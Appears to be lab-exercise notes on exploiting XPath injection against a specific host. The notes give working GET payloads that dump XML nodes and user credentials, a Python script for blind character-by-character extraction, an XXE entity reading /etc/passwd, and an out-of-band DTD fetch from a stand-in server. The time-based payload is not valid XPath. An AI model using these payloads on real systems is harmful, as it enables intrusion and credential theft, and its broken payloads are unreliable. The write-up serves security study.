XPath Advanced Data Exfiltration
XPath Advanced Data Exfiltration Notes
1. Understanding XPath Injection
XPath is used to query XML data.
Injection occurs when user input is inserted into an XPath query without proper sanitization.
Common attacks include authentication bypass, data extraction, and blind XPath injection.
2. Successful Payload Analysis
The working payload:
GET /index.php?q=SOMETHINGINVALID&f=fullstreetname+|+/*[1]/*[2]/*[3]/*[1]/*[3]
The
|
(union operator) allowed traversal through multiple XML nodes.The nested
/*[1]/*[2]/*[3]/*[1]/*[3]
structure accessed deeper elements in the XML hierarchy.
3. Additional Exploration
Extract Full XML Structure
Try dumping all available XML elements:
GET /index.php?q=SOMETHINGINVALID&f=| //*
Navigate deeper step by step:
GET /index.php?q=SOMETHINGINVALID&f=| /*/*/*/*
Extract Multiple Fields
To retrieve multiple values at once:
GET /index.php?q=SOMETHINGINVALID&f=fullstreetname | phone | email
Extract Usernames and Passwords
List all users:
GET /index.php?q=SOMETHINGINVALID&f=//users/user/*
Extract credentials:
GET /index.php?q=SOMETHINGINVALID&f=//users/user[1]/password
4. Blind XPath Injection
Boolean-Based Extraction
Check if a username starts with ‘A’:
GET /index.php?q=SOMETHINGINVALID&f=boolean(substring(//users/user/username,1,1)='A')
Automated Character-by-Character Extraction
import requests
import string
url = "http://94.237.53.146:51113/index.php"
extracted_data = ""
for i in range(1, 50): # Adjust based on expected length
for char in string.ascii_letters + string.digits:
payload = f"substring(//users/user/username,{i},1)='{char}'"
response = requests.get(url, params={"q": "SOMETHINGINVALID", "f": payload})
if "valid response" in response.text: # Adjust based on response behavior
extracted_data += char
print(f"Extracted so far: {extracted_data}")
break
print(f"Final Extracted Data: {extracted_data}")
5. Advanced Attacks
Time-Based Blind Injection
If there’s no direct output, force longer responses:
GET /index.php?q=SOMETHINGINVALID&f=if(boolean(substring(//users/user/username,1,1)='A'), //*[count(//users/user/*) > 100000], //*[1])
Testing for XXE Injection
<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<foo>&xxe;</foo>
If the response includes file contents, the server is vulnerable.
Out-of-Band (OOB) Data Exfiltration
<!DOCTYPE foo [ <!ENTITY % remote SYSTEM "http://your-server.com/malicious.dtd"> %remote; ]>
If the server contacts your external URL, it confirms an OOB vulnerability.
Conclusion
XPath injection was successfully exploited.
Additional attacks were tested for further enumeration.
Blind extraction techniques and external entity vulnerabilities were explored.
Last updated